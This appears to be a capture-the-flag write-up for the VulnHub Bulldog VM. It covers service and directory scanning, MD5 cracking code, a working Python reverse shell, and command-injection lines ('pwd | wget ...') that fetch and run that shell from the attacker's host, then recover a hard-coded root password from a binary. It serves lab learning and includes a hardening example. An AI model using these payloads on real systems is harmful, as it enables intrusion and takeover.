NEKO

vulnhub-Bulldog

2018/07/27

Service scan

Only the IP is given, so start by scanning for services:

nmap -sS -A -O -Pn -T4 192.168.199.129

23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries

Both web ports are served by Python's WSGIServer (Python 2.7.12), so the site is written in Python. Note also that SSH is listening on 23/tcp rather than the usual 22.

Directory scan

How to tell whether a site is Django: https://www.leavesongs.com/PENETRATION/detect-django.html
dirsearch's default wordlist was not good enough here.
dirb was more reliable:

dirb http://192.168.199.129

Directories found:

http://192.168.199.129/admin/
http://192.168.199.129/dev/
http://192.168.199.129/dev/shell/ (no permission to use the shell at this point)
...(some useless directories)

Log in to the admin panel

The /admin backend confirms it is Django.
The page source of /dev contains MD5 hashes inside HTML comments; cmd5 wants money, so I used hashes other people had already cracked (:з」∠):

Username: sarah
Password: bulldoglover

After logging in with these, /dev/shell becomes usable.
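The hashes in the /dev comments are plain, unsalted MD5, which is exactly why a public lookup service can reverse them; the same thing can be done locally against a wordlist with a few mangling rules. The block below is an added example (my code, not anything from the Bulldog VM or the referenced write-up): the target hashes are computed inline from the password the page recovered plus two made-up ones, since the page does not reproduce the real hashes, and the wordlist and rules are my own.

```python
import hashlib
from typing import Dict, Iterable, Set


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def mangle(word: str) -> Iterable[str]:
    """A few cheap rules of the kind cracking tools apply to each wordlist entry."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for suffix in ("1", "123", "!", "2017", "2018"):
            yield base + suffix


def crack_md5(targets: Set[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {hash: plaintext} for every target hash hit by wordlist + rules.

    Unsalted MD5 means one hash computation per candidate covers every
    target at once; there is no per-user work to slow the attacker down.
    """
    remaining = {t.lower() for t in targets}
    found: Dict[str, str] = {}
    for word in wordlist:
        for candidate in mangle(word.strip()):
            h = md5_hex(candidate)
            if h in remaining:
                found[h] = candidate
                remaining.discard(h)
                if not remaining:
                    return found
    return found


# Constructed demo data: these hashes are computed here, they are NOT copies
# of the hashes from the /dev page source.
DEMO_HASHES = {
    md5_hex("bulldoglover"),          # the password the page recovered
    md5_hex("Bulldog2017"),           # made up; reachable via capitalize + suffix rule
    md5_hex("not-in-any-wordlist"),   # made up; should stay uncracked
}
DEMO_WORDLIST = ["password", "sarah", "bulldog", "bulldoglover"]


if __name__ == "__main__":
    for h, pw in crack_md5(DEMO_HASHES, DEMO_WORDLIST).items():
        print(h, pw)
```

Swap DEMO_WORDLIST for a file such as rockyou.txt and DEMO_HASHES for the hashes lifted from the page source; a hash that stays in `remaining` after the run is simply not in the list, which is the only protection an unsalted MD5 ever had.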

getshell

On Kali, create a neko directory and put the Python reverse-shell script pythonshell.py in it:

import socket, subprocess, os

# Connect back to the attacker box (Kali) at 192.168.199.154:1234.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.199.154", 1234))

# Point stdin, stdout and stderr of this process at the socket, so the
# shell spawned below reads and writes over the TCP connection.
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# Spawn an interactive bash; this runs under the target's Python 2.7.12 and under Python 3.
p = subprocess.call(["/bin/bash", "-i"])

Serve the neko directory over HTTP from Kali (SimpleHTTPServer is the Python 2 module; with Python 3 the equivalent is python3 -m http.server 80):

python -m SimpleHTTPServer 80

In the /dev/shell page, use command injection to make the target download the script: the permitted command pwd goes first and the real command is chained behind a pipe, so it runs on the target's shell. The file lands in the app's working directory (/home/django/bulldog, as the ls below shows):

pwd | wget http://192.168.199.154/pythonshell.py

Then start a listener on port 1234 on Kali (nc -l -p 1234) and run this in /dev/shell:

pwd | python pythonshell.py

Kali gets the shell back:

root@neko:~# nc -l -p 1234
bash: cannot set terminal process group (928): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$ ls
ls
bulldog
db.sqlite3
manage.py
pythonshell.py
django@bulldog:/home/django/bulldog$
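The reason `pwd | wget ...` gets through is the general pattern of a web shell that validates only the first word of the submitted line and then hands the whole line to a shell. As an added illustration (my code, not Bulldog's actual view; the whitelist and the function names are assumptions), here is that check next to a version that executes the argv directly without a shell, so that a pipe or semicolon is just a literal argument:

```python
import shlex
import subprocess

# Assumed whitelist for the illustration; the real app's list is not shown on this page.
ALLOWED = {"pwd", "ls", "whoami", "echo"}


def run_vulnerable(cmd: str) -> str:
    """Validates only the first word, then hands the whole line to /bin/sh.

    Anything after '|', ';', '&&' or inside $(...) is executed unchecked,
    which is the shape of bug that makes 'pwd | wget ...' work.
    """
    stripped = cmd.strip()
    first = stripped.split(None, 1)[0] if stripped else ""
    if first not in ALLOWED:
        return "command not allowed"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(cmd: str) -> str:
    """Tokenises with shlex and executes the argv directly, with no shell.

    The program that runs is always argv[0], which is what the whitelist is
    checked against; '|' and ';' reach the program as ordinary arguments.
    """
    try:
        argv = shlex.split(cmd)
    except ValueError:            # unbalanced quotes
        return "bad quoting"
    if not argv or argv[0] not in ALLOWED:
        return "command not allowed"
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for line in ("echo hi | tr a-z A-Z", "echo hi; echo injected", "cat /etc/passwd"):
        print(repr(line), "->", repr(run_vulnerable(line)), "|", repr(run_hardened(line)))
```

Dropping `shell=True` is the actual fix; the whitelist is only as good as its entries, so it must not contain anything that can itself read arbitrary files or run other programs (python, wget, find with -exec, and so on), or the no-shell version is just a longer route to the same result.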

In /home/bulldogadmin/.hiddenadmindirectory we find:

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -la
ls -la
total 24
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 2017 .
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21 2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26 2017 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin 619 Sep 21 2017 note

note:

cat note 
Nick,

I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!

It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?

Let me know what you think of it!

-Ashley

The note hints that root privileges are involved.
The next step is one I genuinely would not have thought of; noted.

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
/lib64/ld-linux-x86-64.so.2
32S0-t
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
Usage: ./customPermissionApp <username>
sudo su root
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
customPermissionApp.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

Among the strings:

SUPERultH
imatePASH
SWORDyouH
CANTget

The binary also imports system and contains the string sudo su root, so it shells out to sudo. The stray trailing H on the first three fragments is an artifact of how the compiler stores the string: it is written onto the stack 8 bytes at a time with movabs rax, imm64 instructions, and the byte right after each 8-byte immediate is the 0x48 REX.W prefix of the next mov, which strings prints as the ASCII character H.

Dropping that artifact, the password is presumably:

SUPERultimatePASSWORDyouCANTget
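The fragment layout above can be reproduced and decoded properly rather than by eye. The following is an added example (my code, not part of the write-up): it builds a constructed byte sequence that mimics the GCC pattern of copying a string literal onto the stack with movabs, runs a strings(1)-style scan over it to show the same H-terminated fragments, and then recovers the password by pulling the 8-byte immediates out of the movabs instructions. The bytes are constructed, not dumped from customPermissionApp, and the displacements and prologue are assumptions.

```python
import re

# Constructed machine code, NOT bytes from customPermissionApp. It reproduces
# the pattern GCC emits when a function copies a short string literal into a
# stack buffer one 8-byte chunk at a time:
#   48 B8 <imm64>   movabs rax, imm64         (REX.W prefix 0x48 is ASCII 'H')
#   48 89 45 xx     mov    [rbp+disp8], rax    (again starts with 0x48 = 'H')
SECRET = b"SUPERultimatePASSWORDyouCANTget"   # 31 chars + NUL = 32 bytes = 4 chunks


def build_text_section(secret: bytes) -> bytes:
    padded = secret + b"\x00" * (-len(secret) % 8)    # NUL-pad to a multiple of 8
    code = b"\x55\x48\x89\xe5"                         # push rbp; mov rbp, rsp (assumed prologue)
    for off in range(0, len(padded), 8):
        code += b"\x48\xb8" + padded[off:off + 8]      # movabs rax, <8 bytes of the string>
        code += b"\x48\x89\x45" + bytes([(0xd0 + off) & 0xff])  # mov [rbp-0x30+off], rax
    return code


def strings(blob: bytes, min_len: int = 4) -> list:
    """Same rule as strings(1): runs of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def movabs_immediates(blob: bytes) -> list:
    """Linear scan for REX.W + (B8+r) = movabs r64, imm64; return each imm64.

    Good enough for this pattern. For a real binary use objdump -d, because
    the byte pair 48 B8 can also occur inside data or another instruction.
    """
    imms = []
    i = 0
    while i + 10 <= len(blob):
        if blob[i] == 0x48 and 0xb8 <= blob[i + 1] <= 0xbf:
            imms.append(blob[i + 2:i + 10])
            i += 10            # skip the immediate so its bytes are not rescanned
        else:
            i += 1
    return imms


def recover_from_immediates(blob: bytes) -> str:
    """Concatenate the immediates in program order and drop the NUL padding."""
    return b"".join(movabs_immediates(blob)).rstrip(b"\x00").decode("ascii")


def recover_from_strings(fragments: list) -> str:
    """The shortcut used above: a 9-char fragment is 8 bytes of immediate plus
    the stray 'H' (0x48) of the following instruction, so drop that last char.
    This guess breaks if the real string has an 'H' right at a chunk boundary."""
    return "".join(f[:-1] if len(f) == 9 and f.endswith("H") else f for f in fragments)


if __name__ == "__main__":
    blob = build_text_section(SECRET)
    print(strings(blob))                        # ['SUPERultH', 'imatePASH', 'SWORDyouH', 'CANTget']
    print(recover_from_strings(strings(blob)))  # SUPERultimatePASSWORDyouCANTget
    print(recover_from_immediates(blob))        # SUPERultimatePASSWORDyouCANTget
```

On the real binary the equivalent is objdump -d customPermissionApp and reading the movabs immediates as little-endian ASCII; that works even when the fragment boundaries happen to fall on a letter that strings cannot distinguish from an opcode byte.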

getflag:

# upgrade to a proper TTY first, otherwise sudo cannot prompt for a password
python -c 'import pty;pty.spawn("/bin/bash")'
# sudo asks for the django user's password: enter SUPERultimatePASSWORDyouCANTget
sudo su

Finally the flag is in /root/congrats.txt.
Reference: http://sec-redclub.com/archives/872/

Author: n3k0

Published: July 27th 2018, 4:33:02
